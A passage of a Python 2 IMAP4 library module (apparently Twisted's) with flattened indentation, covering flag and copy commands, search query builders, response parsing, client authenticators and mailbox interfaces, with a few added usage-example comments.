"""Remove from the set flags for one or more messages.
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type flags: Any iterable of C{str}
@param flags: The flags to set
@type silent: C{bool}
        @param silent: If true, cause the server to suppress its verbose
response.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
        @return: A deferred whose callback is invoked with a list of
        the server's responses (C{[]} if C{silent} is true) or whose
errback is invoked if there is an error.
"""
return self._store(str(messages), '-FLAGS', silent, flags, uid)
def _store(self, messages, cmd, silent, flags, uid):
if silent:
cmd = cmd + '.SILENT'
store = uid and 'UID STORE' or 'STORE'
args = ' '.join((messages, cmd, '(%s)' % ' '.join(flags)))
d = self.sendCommand(Command(store, args, wantResponse=('FETCH',)))
expected = ()
if not silent:
expected = ('FLAGS',)
d.addCallback(self._cbFetch, expected, True)
return d
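    # Editorial illustration (not part of the original module): marking
    # messages 3 through 5 (by UID) as seen via the STORE helpers above;
    # `proto` is hypothetical.
    #
    #     d = proto.addFlags('3:5', ('\\Seen',), uid=1)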
def copy(self, messages, mailbox, uid):
"""Copy the specified messages to the specified mailbox.
This command is allowed in the Selected state.
@type messages: C{str}
@param messages: A message sequence set
@type mailbox: C{str}
@param mailbox: The mailbox to which to copy the messages
@type uid: C{bool}
@param uid: If true, the C{messages} refers to message UIDs, rather
than message sequence numbers.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a true value
when the copy is successful, or whose errback is invoked if there
is an error.
"""
if uid:
cmd = 'UID COPY'
else:
cmd = 'COPY'
args = '%s %s' % (messages, _prepareMailboxName(mailbox))
return self.sendCommand(Command(cmd, args))
#
# IMailboxListener methods
#
def modeChanged(self, writeable):
"""Override me"""
def flagsChanged(self, newFlags):
"""Override me"""
def newMessages(self, exists, recent):
"""Override me"""
class IllegalIdentifierError(IMAP4Exception): pass
def parseIdList(s, lastMessageId=None):
"""
Parse a message set search key into a C{MessageSet}.
@type s: C{str}
@param s: A string description of a id list, for example "1:3, 4:*"
@type lastMessageId: C{int}
@param lastMessageId: The last message sequence id or UID, depending on
whether we are parsing the list in UID or sequence id context. The
caller should pass in the correct value.
@rtype: C{MessageSet}
@return: A C{MessageSet} that contains the ids defined in the list
"""
res = MessageSet()
parts = s.split(',')
for p in parts:
if ':' in p:
low, high = p.split(':', 1)
try:
if low == '*':
low = None
else:
low = long(low)
if high == '*':
high = None
else:
high = long(high)
if low is high is None:
# *:* does not make sense
raise IllegalIdentifierError(p)
# non-positive values are illegal according to RFC 3501
if ((low is not None and low <= 0) or
(high is not None and high <= 0)):
raise IllegalIdentifierError(p)
# star means "highest value of an id in the mailbox"
high = high or lastMessageId
low = low or lastMessageId
# RFC says that 2:4 and 4:2 are equivalent
if low > high:
low, high = high, low
res.extend((low, high))
except ValueError:
raise IllegalIdentifierError(p)
else:
try:
if p == '*':
p = None
else:
p = long(p)
if p is not None and p <= 0:
raise IllegalIdentifierError(p)
except ValueError:
raise IllegalIdentifierError(p)
else:
res.extend(p or lastMessageId)
return res
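# Editorial illustration (not part of the original module): how id list
# strings map onto MessageSet ranges.
#
#     parseIdList('1:3,6', lastMessageId=10)   ==> MessageSet of 1-3 and 6
#     parseIdList('4:*', lastMessageId=10)     ==> MessageSet of 4-10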
class IllegalQueryError(IMAP4Exception): pass
_SIMPLE_BOOL = (
'ALL', 'ANSWERED', 'DELETED', 'DRAFT', 'FLAGGED', 'NEW', 'OLD', 'RECENT',
'SEEN', 'UNANSWERED', 'UNDELETED', 'UNDRAFT', 'UNFLAGGED', 'UNSEEN'
)
_NO_QUOTES = (
'LARGER', 'SMALLER', 'UID'
)
def Query(sorted=0, **kwarg):
"""Create a query string
Among the accepted keywords are::
all : If set to a true value, search all messages in the
current mailbox
answered : If set to a true value, search messages flagged with
\\Answered
bcc : A substring to search the BCC header field for
before : Search messages with an internal date before this
value. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
body : A substring to search the body of the messages for
cc : A substring to search the CC header field for
deleted : If set to a true value, search messages flagged with
\\Deleted
draft : If set to a true value, search messages flagged with
\\Draft
flagged : If set to a true value, search messages flagged with
\\Flagged
from : A substring to search the From header field for
header : A two-tuple of a header name and substring to search
for in that header
keyword : Search for messages with the given keyword set
larger : Search for messages larger than this number of octets
messages : Search only the given message sequence set.
new : If set to a true value, search messages flagged with
\\Recent but not \\Seen
old : If set to a true value, search messages not flagged with
\\Recent
on : Search messages with an internal date which is on this
date. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
recent : If set to a true value, search for messages flagged with
\\Recent
seen : If set to a true value, search for messages flagged with
\\Seen
sentbefore : Search for messages with an RFC822 'Date' header before
this date. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
senton : Search for messages with an RFC822 'Date' header which is
            on this date. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
sentsince : Search for messages with an RFC822 'Date' header which is
after this date. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
since : Search for messages with an internal date that is after
            this date. The given date should be a string in the format
of 'DD-Mon-YYYY'. For example, '03-Mar-2003'.
smaller : Search for messages smaller than this number of octets
subject : A substring to search the 'subject' header for
text : A substring to search the entire message for
to : A substring to search the 'to' header for
uid : Search only the messages in the given message set
unanswered : If set to a true value, search for messages not
flagged with \\Answered
undeleted : If set to a true value, search for messages not
flagged with \\Deleted
undraft : If set to a true value, search for messages not
flagged with \\Draft
unflagged : If set to a true value, search for messages not
flagged with \\Flagged
unkeyword : Search for messages without the given keyword set
unseen : If set to a true value, search for messages not
flagged with \\Seen
@type sorted: C{bool}
    @param sorted: If true, the output will be sorted alphabetically.
The standard does not require it, but it makes testing this function
easier. The default is zero, and this should be acceptable for any
application.
@rtype: C{str}
@return: The formatted query string
"""
cmd = []
keys = kwarg.keys()
if sorted:
keys.sort()
for k in keys:
v = kwarg[k]
k = k.upper()
if k in _SIMPLE_BOOL and v:
cmd.append(k)
elif k == 'HEADER':
cmd.extend([k, v[0], '"%s"' % (v[1],)])
elif k not in _NO_QUOTES:
cmd.extend([k, '"%s"' % (v,)])
else:
cmd.extend([k, '%s' % (v,)])
if len(cmd) > 1:
return '(%s)' % ' '.join(cmd)
else:
return ' '.join(cmd)
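# Editorial illustration (not part of the original module): a sample
# query built with C{sorted=1} so the key order is deterministic.
#
#     Query(sorted=1, unseen=1, subject='pepperoni')
#     ==> '(SUBJECT "pepperoni" UNSEEN)'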
def Or(*args):
"""The disjunction of two or more queries"""
if len(args) < 2:
raise IllegalQueryError, args
elif len(args) == 2:
return '(OR %s %s)' % args
else:
return '(OR %s %s)' % (args[0], Or(*args[1:]))
def Not(query):
"""The negation of a query"""
return '(NOT %s)' % (query,)
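# Editorial illustration (not part of the original module): combining
# simple queries.
#
#     Or(Query(seen=1), Query(flagged=1))  ==> '(OR SEEN FLAGGED)'
#     Not(Query(deleted=1))                ==> '(NOT DELETED)'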
class MismatchedNesting(IMAP4Exception):
pass
class MismatchedQuoting(IMAP4Exception):
pass
def wildcardToRegexp(wildcard, delim=None):
wildcard = wildcard.replace('*', '(?:.*?)')
if delim is None:
wildcard = wildcard.replace('%', '(?:.*?)')
else:
wildcard = wildcard.replace('%', '(?:(?:[^%s])*?)' % re.escape(delim))
return re.compile(wildcard, re.I)
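# Editorial illustration (not part of the original module): with a
# delimiter, '%' is prevented from consuming the delimiter character,
# while '*' may cross it; matching is case-insensitive.
#
#     pattern = wildcardToRegexp('INBOX.%', '.')
#     pattern.match('inbox.Sent') is not None  ==> True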
def splitQuoted(s):
"""Split a string into whitespace delimited tokens
Tokens that would otherwise be separated but are surrounded by \"
remain as a single token. Any token that is not quoted and is
equal to \"NIL\" is tokenized as C{None}.
@type s: C{str}
@param s: The string to be split
@rtype: C{list} of C{str}
@return: A list of the resulting tokens
@raise MismatchedQuoting: Raised if an odd number of quotes are present
"""
s = s.strip()
result = []
word = []
inQuote = inWord = False
for i, c in enumerate(s):
if c == '"':
if i and s[i-1] == '\\':
word.pop()
word.append('"')
elif not inQuote:
inQuote = True
else:
inQuote = False
result.append(''.join(word))
word = []
elif not inWord and not inQuote and c not in ('"' + string.whitespace):
inWord = True
word.append(c)
elif inWord and not inQuote and c in string.whitespace:
w = ''.join(word)
if w == 'NIL':
result.append(None)
else:
result.append(w)
word = []
inWord = False
elif inWord or inQuote:
word.append(c)
if inQuote:
raise MismatchedQuoting(s)
if inWord:
w = ''.join(word)
if w == 'NIL':
result.append(None)
else:
result.append(w)
return result
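# Editorial illustration (not part of the original module): quoted runs
# stay whole, and an unquoted NIL becomes None.
#
#     splitQuoted('foo "bar baz" NIL')  ==> ['foo', 'bar baz', None]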
def splitOn(sequence, predicate, transformers):
result = []
mode = predicate(sequence[0])
tmp = [sequence[0]]
for e in sequence[1:]:
p = predicate(e)
if p != mode:
result.extend(transformers[mode](tmp))
tmp = [e]
mode = p
else:
tmp.append(e)
result.extend(transformers[mode](tmp))
return result
def collapseStrings(results):
"""
Turns a list of length-one strings and lists into a list of longer
strings and lists. For example,
['a', 'b', ['c', 'd']] is returned as ['ab', ['cd']]
@type results: C{list} of C{str} and C{list}
@param results: The list to be collapsed
@rtype: C{list} of C{str} and C{list}
@return: A new list which is the collapsed form of C{results}
"""
copy = []
begun = None
listsList = [isinstance(s, types.ListType) for s in results]
pred = lambda e: isinstance(e, types.TupleType)
tran = {
0: lambda e: splitQuoted(''.join(e)),
1: lambda e: [''.join([i[0] for i in e])]
}
for (i, c, isList) in zip(range(len(results)), results, listsList):
if isList:
if begun is not None:
copy.extend(splitOn(results[begun:i], pred, tran))
begun = None
copy.append(collapseStrings(c))
elif begun is None:
begun = i
if begun is not None:
copy.extend(splitOn(results[begun:], pred, tran))
return copy
def parseNestedParens(s, handleLiteral = 1):
"""Parse an s-exp-like string into a more useful data structure.
@type s: C{str}
@param s: The s-exp-like string to parse
@rtype: C{list} of C{str} and C{list}
@return: A list containing the tokens present in the input.
@raise MismatchedNesting: Raised if the number or placement
of opening or closing parenthesis is invalid.
"""
s = s.strip()
inQuote = 0
contentStack = [[]]
try:
i = 0
L = len(s)
while i < L:
c = s[i]
if inQuote:
if c == '\\':
contentStack[-1].append(s[i:i+2])
i += 2
continue
elif c == '"':
inQuote = not inQuote
contentStack[-1].append(c)
i += 1
else:
if c == '"':
contentStack[-1].append(c)
inQuote = not inQuote
i += 1
elif handleLiteral and c == '{':
end = s.find('}', i)
if end == -1:
raise ValueError, "Malformed literal"
literalSize = int(s[i+1:end])
contentStack[-1].append((s[end+3:end+3+literalSize],))
i = end + 3 + literalSize
elif c == '(' or c == '[':
contentStack.append([])
i += 1
elif c == ')' or c == ']':
contentStack[-2].append(contentStack.pop())
i += 1
else:
contentStack[-1].append(c)
i += 1
except IndexError:
raise MismatchedNesting(s)
if len(contentStack) != 1:
raise MismatchedNesting(s)
return collapseStrings(contentStack[0])
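# Editorial illustration (not part of the original module): a typical
# FETCH-style response fragment parsed into nested lists.
#
#     parseNestedParens('(FLAGS (\\Seen) UID 42)')
#     ==> [['FLAGS', ['\\Seen'], 'UID', '42']]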
def _quote(s):
return '"%s"' % (s.replace('\\', '\\\\').replace('"', '\\"'),)
def _literal(s):
return '{%d}\r\n%s' % (len(s), s)
class DontQuoteMe:
def __init__(self, value):
self.value = value
def __str__(self):
return str(self.value)
_ATOM_SPECIALS = '(){ %*"'
def _needsQuote(s):
if s == '':
return 1
for c in s:
if c < '\x20' or c > '\x7f':
return 1
if c in _ATOM_SPECIALS:
return 1
return 0
def _prepareMailboxName(name):
name = name.encode('imap4-utf-7')
if _needsQuote(name):
return _quote(name)
return name
def _needsLiteral(s):
# Change this to "return 1" to wig out stupid clients
return '\n' in s or '\r' in s or len(s) > 1000
def collapseNestedLists(items):
"""Turn a nested list structure into an s-exp-like string.
Strings in C{items} will be sent as literals if they contain CR or LF,
otherwise they will be quoted. References to None in C{items} will be
translated to the atom NIL. Objects with a 'read' attribute will have
it called on them with no arguments and the returned string will be
inserted into the output as a literal. Integers will be converted to
strings and inserted into the output unquoted. Instances of
C{DontQuoteMe} will be converted to strings and inserted into the output
unquoted.
This function used to be much nicer, and only quote things that really
    needed to be quoted (and C{DontQuoteMe} did not exist); however, many
broken IMAP4 clients were unable to deal with this level of sophistication,
forcing the current behavior to be adopted for practical reasons.
@type items: Any iterable
@rtype: C{str}
"""
pieces = []
for i in items:
if i is None:
pieces.extend([' ', 'NIL'])
elif isinstance(i, (DontQuoteMe, int, long)):
pieces.extend([' ', str(i)])
elif isinstance(i, types.StringTypes):
if _needsLiteral(i):
pieces.extend([' ', '{', str(len(i)), '}', IMAP4Server.delimiter, i])
else:
pieces.extend([' ', _quote(i)])
elif hasattr(i, 'read'):
d = i.read()
pieces.extend([' ', '{', str(len(d)), '}', IMAP4Server.delimiter, d])
else:
pieces.extend([' ', '(%s)' % (collapseNestedLists(i),)])
return ''.join(pieces[1:])
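# Editorial illustration (not part of the original module): the inverse
# direction from parsing, serializing Python structures for the wire.
#
#     collapseNestedLists([None, 42, 'two words', ['a', 'b']])
#     ==> 'NIL 42 "two words" ("a" "b")'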
class IClientAuthentication(Interface):
def getName():
"""Return an identifier associated with this authentication scheme.
@rtype: C{str}
"""
def challengeResponse(secret, challenge):
"""Generate a challenge response string"""
class CramMD5ClientAuthenticator:
implements(IClientAuthentication)
def __init__(self, user):
self.user = user
def getName(self):
return "CRAM-MD5"
def challengeResponse(self, secret, chal):
response = hmac.HMAC(secret, chal).hexdigest()
return '%s %s' % (self.user, response)
class LOGINAuthenticator:
implements(IClientAuthentication)
def __init__(self, user):
self.user = user
self.challengeResponse = self.challengeUsername
def getName(self):
return "LOGIN"
def challengeUsername(self, secret, chal):
# Respond to something like "Username:"
self.challengeResponse = self.challengeSecret
return self.user
def challengeSecret(self, secret, chal):
# Respond to something like "Password:"
return secret
class PLAINAuthenticator:
implements(IClientAuthentication)
def __init__(self, user):
self.user = user
def getName(self):
return "PLAIN"
def challengeResponse(self, secret, chal):
return '\0%s\0%s' % (self.user, secret)
class MailboxException(IMAP4Exception): pass
class MailboxCollision(MailboxException):
def __str__(self):
return 'Mailbox named %s already exists' % self.args
class NoSuchMailbox(MailboxException):
def __str__(self):
return 'No mailbox named %s exists' % self.args
class ReadOnlyMailbox(MailboxException):
def __str__(self):
return 'Mailbox open in read-only state'
class IAccount(Interface):
"""Interface for Account classes
Implementors of this interface should consider implementing
C{INamespacePresenter}.
"""
def addMailbox(name, mbox = None):
"""Add a new mailbox to this account
@type name: C{str}
@param name: The name associated with this mailbox. It may not
contain multiple hierarchical parts.
@type mbox: An object implementing C{IMailbox}
@param mbox: The mailbox to associate with this name. If C{None},
a suitable default is created and used.
@rtype: C{Deferred} or C{bool}
@return: A true value if the creation succeeds, or a deferred whose
callback will be invoked when the creation succeeds.
@raise MailboxException: Raised if this mailbox cannot be added for
some reason. This may also be raised asynchronously, if a C{Deferred}
is returned.
"""
def create(pathspec):
"""Create a new mailbox from the given hierarchical name.
@type pathspec: C{str}
@param pathspec: The full hierarchical name of a new mailbox to create.
If any of the inferior hierarchical names to this one do not exist,
they are created as well.
@rtype: C{Deferred} or C{bool}
@return: A true value if the creation succeeds, or a deferred whose
callback will be invoked when the creation succeeds.
@raise MailboxException: Raised if this mailbox cannot be added.
This may also be raised asynchronously, if a C{Deferred} is
returned.
"""
def select(name, rw=True):
"""Acquire a mailbox, given its name.
@type name: C{str}
@param name: The mailbox to acquire
@type rw: C{bool}
@param rw: If a true value, request a read-write version of this
mailbox. If a false value, request a read-only version.
@rtype: Any object implementing C{IMailbox} or C{Deferred}
@return: The mailbox object, or a C{Deferred} whose callback will
        be invoked with the mailbox object. C{None} may be returned if the
        specified mailbox cannot be selected for any reason.
"""
def delete(name):
"""Delete the mailbox with the specified name.
@type name: C{str}
@param name: The mailbox to delete.
@rtype: C{Deferred} or C{bool}
@return: A true value if the mailbox is successfully deleted, or a
C{Deferred} whose callback will be invoked when the deletion
completes.
@raise MailboxException: Raised if this mailbox cannot be deleted.
This may also be raised asynchronously, if a C{Deferred} is returned.
"""
def rename(oldname, newname):
"""Rename a mailbox
@type oldname: C{str}
@param oldname: The current name of the mailbox to rename.
@type newname: C{str}
@param newname: The new name to associate with the mailbox.
@rtype: C{Deferred} or C{bool}
@return: A true value if the mailbox is successfully renamed, or a
C{Deferred} whose callback will be invoked when the rename operation
is completed.
@raise MailboxException: Raised if this mailbox cannot be
renamed. This may also be raised asynchronously, if a C{Deferred}
is returned.
"""
def isSubscribed(name):
"""Check the subscription status of a mailbox
@type name: C{str}
@param name: The name of the mailbox to check
@rtype: C{Deferred} or C{bool}
@return: A true value if the given mailbox is currently subscribed
to, a false value otherwise. A C{Deferred} may also be returned
whose callback will be invoked with one of these values.
"""
def subscribe(name):
"""Subscribe to a mailbox
@type name: C{str}
@param name: The name of the mailbox to subscribe to
@rtype: C{Deferred} or C{bool}
@return: A true value if the mailbox is subscribed to successfully,
or a Deferred whose callback will be invoked with this value when
the subscription is successful.
@raise MailboxException: Raised if this mailbox cannot be
subscribed to. This may also be raised asynchronously, if a
C{Deferred} is returned.
"""
def unsubscribe(name):
"""Unsubscribe from a mailbox
@type name: C{str}
@param name: The name of the mailbox to unsubscribe from
@rtype: C{Deferred} or C{bool}
@return: A true value if the mailbox is unsubscribed from successfully,
or a Deferred whose callback will be invoked with this value when
the unsubscription is successful.
@raise MailboxException: Raised if this mailbox cannot be
unsubscribed from. This may also be raised asynchronously, if a
C{Deferred} is returned.
"""
def listMailboxes(ref, wildcard):
"""List all the mailboxes that meet a certain criteria
@type ref: C{str}
@param ref: The context in which to apply the wildcard
@type wildcard: C{str}
@param wildcard: An expression against which to match mailbox names.
'*' matches any number of characters in a mailbox name, and '%'
matches similarly, but will not match across hierarchical boundaries.
@rtype: C{list} of C{tuple}
@return: A list of C{(mailboxName, mailboxObject)} which meet the
given criteria. C{mailboxObject} should implement either
C{IMailboxInfo} or C{IMailbox}. A Deferred may also be returned.
"""
class INamespacePresenter(Interface):
def getPersonalNamespaces():
"""Report the available personal namespaces.
Typically there should be only one personal namespace. A common
name for it is \"\", and its hierarchical delimiter is usually
\"/\".
@rtype: iterable of two-tuples of strings
@return: The personal namespaces and their hierarchical delimiters.
If no namespaces of this type exist, None should be returned.
"""
def getSharedNamespaces():
"""Report the available shared namespaces.
        Shared namespaces do not belong to any individual user but are
        usually accessible to one or more of them. An example of a shared
        namespace might be \"#news\" for a usenet gateway.
@rtype: iterable of two-tuples of strings
@return: The shared namespaces and their hierarchical delimiters.
If no namespaces of this type exist, None should be returned.
"""
def getUserNamespaces():
"""Report the available user namespaces.
        These are namespaces that contain folders belonging to other users,
        access to which has been granted to this account.
@rtype: iterable of two-tuples of strings
@return: The user namespaces and their hierarchical delimiters.
If no namespaces of this type exist, None should be returned.
"""
class MemoryAccount(object):
implements(IAccount, INamespacePresenter)
mailboxes = None
subscriptions = None
top_id = 0
def __init__(self, name):
self.name = name
self.mailboxes = {}
self.subscriptions = []
def allocateID(self):
id = self.top_id
self.top_id += 1
return id
##
## IAccount
##
def addMailbox(self, name, mbox = None):
name = name.upper()
if self.mailboxes.has_key(name):
raise MailboxCollision, name
if mbox is None:
mbox = self._emptyMailbox(name, self.allocateID())
self.mailboxes[name] = mbox
return 1
def create(self, pathspec):
paths = filter(None, pathspec.split('/'))
for accum in range(1, len(paths)):
try:
self.addMailbox('/'.join(paths[:accum]))
except MailboxCollision:
pass
try:
self.addMailbox('/'.join(paths))
except MailboxCollision:
if not pathspec.endswith('/'):
return False
return True
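    # Editorial illustration (not part of the original module): on a
    # hypothetical subclass that implements C{_emptyMailbox}, creating a
    # hierarchical name also creates its ancestors (names are uppercased
    # by C{addMailbox}).
    #
    #     acct.create('one/two/three')
    #     ==> mailboxes 'ONE', 'ONE/TWO', and 'ONE/TWO/THREE' now exist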
def _emptyMailbox(self, name, id):
raise NotImplementedError
def select(self, name, readwrite=1):
return self.mailboxes.get(name.upper())
def delete(self, name):
name = name.upper()
# See if this mailbox exists at all
mbox = self.mailboxes.get(name)
if not mbox:
raise MailboxException("No such mailbox")
# See if this box is flagged \Noselect
if r'\Noselect' in mbox.getFlags():
# Check for hierarchically inferior mailboxes with this one
# as part of their root.
for others in self.mailboxes.keys():
if others != name and others.startswith(name):
raise MailboxException, "Hierarchically inferior mailboxes exist and \\Noselect is set"
mbox.destroy()
# iff there are no hierarchically inferior names, we will
# delete it from our ken.
        if len(self._inferiorNames(name)) > 1:
del self.mailboxes[name]
def rename(self, oldname, newname):
oldname = oldname.upper()
newname = newname.upper()
if not self.mailboxes.has_key(oldname):
raise NoSuchMailbox, oldname
inferiors = self._inferiorNames(oldname)
inferiors = [(o, o.replace(oldname, newname, 1)) for o in inferiors]
for (old, new) in inferiors:
if self.mailboxes.has_key(new):
raise MailboxCollision, new
for (old, new) in inferiors:
self.mailboxes[new] = self.mailboxes[old]
del self.mailboxes[old]
def _inferiorNames(self, name):
inferiors = []
for infname in self.mailboxes.keys():
if infname.startswith(name):
inferiors.append(infname)
return inferiors
def isSubscribed(self, name):
return name.upper() in self.subscriptions
def subscribe(self, name):
name = name.upper()
if name not in self.subscriptions:
self.subscriptions.append(name)
def unsubscribe(self, name):
name = name.upper()
if name not in self.subscriptions:
raise MailboxException, "Not currently subscribed to " + name
self.subscriptions.remove(name)
def listMailboxes(self, ref, wildcard):
ref = self._inferiorNames(ref.upper())
wildcard = wildcardToRegexp(wildcard, '/')
return [(i, self.mailboxes[i]) for i in ref if wildcard.match(i)]
##
## INamespacePresenter
##
def getPersonalNamespaces(self):
return [["", "/"]]
def getSharedNamespaces(self):
return None
    def getUserNamespaces(self):
return None
_statusRequestDict = {
'MESSAGES': 'getMessageCount',
'RECENT': 'getRecentCount',
'UIDNEXT': 'getUIDNext',
'UIDVALIDITY': 'getUIDValidity',
'UNSEEN': 'getUnseenCount'
}
def statusRequestHelper(mbox, names):
r = {}
for n in names:
r[n] = getattr(mbox, _statusRequestDict[n.upper()])()
return r
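# Editorial illustration (not part of the original module): mapping
# STATUS names onto the corresponding mailbox accessors.
#
#     statusRequestHelper(mbox, ['MESSAGES', 'UNSEEN'])
#     ==> {'MESSAGES': mbox.getMessageCount(),
#          'UNSEEN': mbox.getUnseenCount()}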
def parseAddr(addr):
if addr is None:
return [(None, None, None),]
addrs = email.Utils.getaddresses([addr])
return [[fn or None, None] + addr.split('@') for fn, addr in addrs]
def getEnvelope(msg):
headers = msg.getHeaders(True)
date = headers.get('date')
subject = headers.get('subject')
from_ = headers.get('from')
sender = headers.get('sender', from_)
reply_to = headers.get('reply-to', from_)
to = headers.get('to')
cc = headers.get('cc')
bcc = headers.get('bcc')
in_reply_to = headers.get('in-reply-to')
mid = headers.get('message-id')
return (date, subject, parseAddr(from_), parseAddr(sender),
reply_to and parseAddr(reply_to), to and parseAddr(to),
cc and parseAddr(cc), bcc and parseAddr(bcc), in_reply_to, mid)
def getLineCount(msg):
# XXX - Super expensive, CACHE THIS VALUE FOR LATER RE-USE
# XXX - This must be the number of lines in the ENCODED version
lines = 0
for _ in msg.getBodyFile():
lines += 1
return lines
def unquote(s):
if s[0] == s[-1] == '"':
return s[1:-1]
return s
def getBodyStructure(msg, extended=False):
# XXX - This does not properly handle multipart messages
# BODYSTRUCTURE is obscenely complex and criminally under-documented.
attrs = {}
headers = 'content-type', 'content-id', 'content-description', 'content-transfer-encoding'
headers = msg.getHeaders(False, *headers)
mm = headers.get('content-type')
if mm:
mm = ''.join(mm.splitlines())
mimetype = mm.split(';')
if mimetype:
type = mimetype[0].split('/', 1)
if len(type) == 1:
major = type[0]
minor = None
elif len(type) == 2:
major, minor = type
else:
major = minor = None
attrs = dict([x.strip().lower().split('=', 1) for x in mimetype[1:]])
else:
major = minor = None
else:
major = minor = None
size = str(msg.getSize())
unquotedAttrs = [(k, unquote(v)) for (k, v) in attrs.iteritems()]
result = [
major, minor, # Main and Sub MIME types
unquotedAttrs, # content-type parameter list
headers.get('content-id'),
headers.get('content-description'),
headers.get('content-transfer-encoding'),
size, # Number of octets total
]
if major is not None:
if major.lower() == 'text':
result.append(str(getLineCount(msg)))
elif (major.lower(), minor.lower()) == ('message', 'rfc822'):
contained = msg.getSubPart(0)
result.append(getEnvelope(contained))
result.append(getBodyStructure(contained, False))
result.append(str(getLineCount(contained)))
if not extended or major is None:
return result
if major.lower() != 'multipart':
headers = 'content-md5', 'content-disposition', 'content-language'
headers = msg.getHeaders(False, *headers)
disp = headers.get('content-disposition')
# XXX - I dunno if this is really right
if disp:
disp = disp.split('; ')
if len(disp) == 1:
disp = (disp[0].lower(), None)
elif len(disp) > 1:
disp = (disp[0].lower(), [x.split('=') for x in disp[1:]])
result.append(headers.get('content-md5'))
result.append(disp)
result.append(headers.get('content-language'))
else:
result = [result]
try:
i = 0
while True:
submsg = msg.getSubPart(i)
result.append(getBodyStructure(submsg))
i += 1
except IndexError:
result.append(minor)
result.append(attrs.items())
# XXX - I dunno if this is really right
headers = msg.getHeaders(False, 'content-disposition', 'content-language')
disp = headers.get('content-disposition')
if disp:
disp = disp.split('; ')
if len(disp) == 1:
disp = (disp[0].lower(), None)
elif len(disp) > 1:
disp = (disp[0].lower(), [x.split('=') for x in disp[1:]])
result.append(disp)
result.append(headers.get('content-language'))
return result
class IMessagePart(Interface):
def getHeaders(negate, *names):
"""Retrieve a group of message headers.
@type names: C{tuple} of C{str}
@param names: The names of the headers to retrieve or omit.
@type negate: C{bool}
@param negate: If True, indicates that the headers listed in C{names}
should be omitted from the return value, rather than included.
@rtype: C{dict}
@return: A mapping of header field names to header field values
"""
def getBodyFile():
"""Retrieve a file object containing only the body of this message.
"""
def getSize():
"""Retrieve the total size, in octets, of this message.
@rtype: C{int}
"""
def isMultipart():
"""Indicate whether this message has subparts.
@rtype: C{bool}
"""
def getSubPart(part):
"""Retrieve a MIME sub-message
@type part: C{int}
@param part: The number of the part to retrieve, indexed from 0.
@raise IndexError: Raised if the specified part does not exist.
@raise TypeError: Raised if this message is not multipart.
@rtype: Any object implementing C{IMessagePart}.
@return: The specified sub-part.
"""
class IMessage(IMessagePart):
def getUID():
"""Retrieve the unique identifier associated with this message.
"""
def getFlags():
"""Retrieve the flags associated with this message.
@rtype: C{iterable}
@return: The flags, represented as strings.
"""
def getInternalDate():
"""Retrieve the date internally associated with this message.
@rtype: C{str}
@return: An RFC822-formatted date string.
"""
class IMessageFile(Interface):
"""Optional message interface for representing messages as files.
    If provided by message objects, this interface will be used instead of
the more complex MIME-based interface.
"""
def open():
"""Return an file-like object opened for reading.
Reading from the returned file will return all the bytes
of which this message consists.
"""
class ISearchableMailbox(Interface):
def search(query, uid):
"""Search for messages that meet the given query criteria.
If this interface is not implemented by the mailbox, L{IMailbox.fetch}
and various methods of L{IMessage} will be used instead.
Implementations which wish to offer better performance than the
default implementation should implement this interface.
@type query: C{list}
@param query: The search criteria
@type uid: C{bool}
@param uid: If true, the IDs specified in the query are UIDs;
otherwise they are message sequence IDs.
@rtype: C{list} or C{Deferred}
@return: A list of message sequence numbers or message UIDs which
match the search criteria or a C{Deferred} whose callback will be
invoked with such a list.
"""
class IMessageCopier(Interface):
def copy(messageObject):
"""Copy the given message object into this mailbox.
The message object will be one which was previously returned by
L{IMailbox.fetch}.
Implementations which wish to offer better performance than the
default implementation should implement this interface.
If this interface is not implemented by the mailbox, IMailbox.addMessage
will be used instead.
@rtype: C{Deferred} or C{int}
@return: Either the UID of the message or a Deferred which fires
with the UID when the copy finishes.
"""
class IMailboxInfo(Interface):
"""Interface specifying only the methods required for C{listMailboxes}.
Implementations can return objects implementing only these methods for
    return to C{listMailboxes} if doing so allows them to operate more
    efficiently.
"""
def getFlags():
"""Return the flags defined in this mailbox
Flags with the \\ prefix are reserved for use as system flags.
@rtype: C{list} of C{str}
@return: A list of the flags that can be set on messages in this mailbox.
"""
def getHierarchicalDelimiter():
"""Get the character which delimits namespaces for in this mailbox.
@rtype: C{str}
"""
class IMailbox(IMailboxInfo):
def getUIDValidity():
"""Return the unique validity identifier for this mailbox.
@rtype: C{int}
"""
def getUIDNext():
"""Return the likely UID for the next message added to this mailbox.
@rtype: C{int}
"""
def getUID(message):
"""Return the UID of a message in the mailbox
@type message: C{int}
@param message: The message sequence number
@rtype: C{int}
@return: The UID of the message.
"""
def getMessageCount():
"""Return the number of messages in this mailbox.
@rtype: C{int}
"""
def getRecentCount():
"""Return the number of messages with the 'Recent' flag.
@rtype: C{int}
"""
def getUnseenCount():
"""Return the number of messages with the 'Unseen' flag.
@rtype: C{int}
"""
def isWriteable():
"""Get the read/write status of the mailbox.
@rtype: C{int}
@return: A true value if write permission is allowed, a false value otherwise.
"""
def destroy():
"""Called before this mailbox is deleted, permanently.
If necessary, all resources held by this mailbox should be cleaned
up here. This function _must_ set the \\Noselect flag on this
mailbox.
"""
def requestStatus(names):
"""Return status information about this mailbox.
        For mailboxes which do not intend to do any special processing
        to generate the return value, C{statusRequestHelper} can be used
        to build the dictionary by calling the other interface methods
        which return the data for each name.
@type names: Any iterable
@param names: The status names to return information regarding.
The possible values for each name are: MESSAGES, RECENT, UIDNEXT,
UIDVALIDITY, UNSEEN.
@rtype: C{dict} or C{Deferred}
@return: A dictionary containing status information about the
requested names is returned. If the process of looking this
information up would be costly, a deferred whose callback will
eventually be passed this dictionary is returned instead.
"""
def addListener(listener):
"""Add a mailbox change listener
@type listener: Any object which implements C{IMailboxListener}
@param listener: An object to add to the set of those which will
be notified when the contents of this mailbox change.
"""
def removeListener(listener):
"""Remove a mailbox change listener
@type listener: Any object previously added to and not removed from
this mailbox as a listener.
@param listener: The object to remove from the set of listeners.
@raise ValueError: Raised when the given object is not a listener for
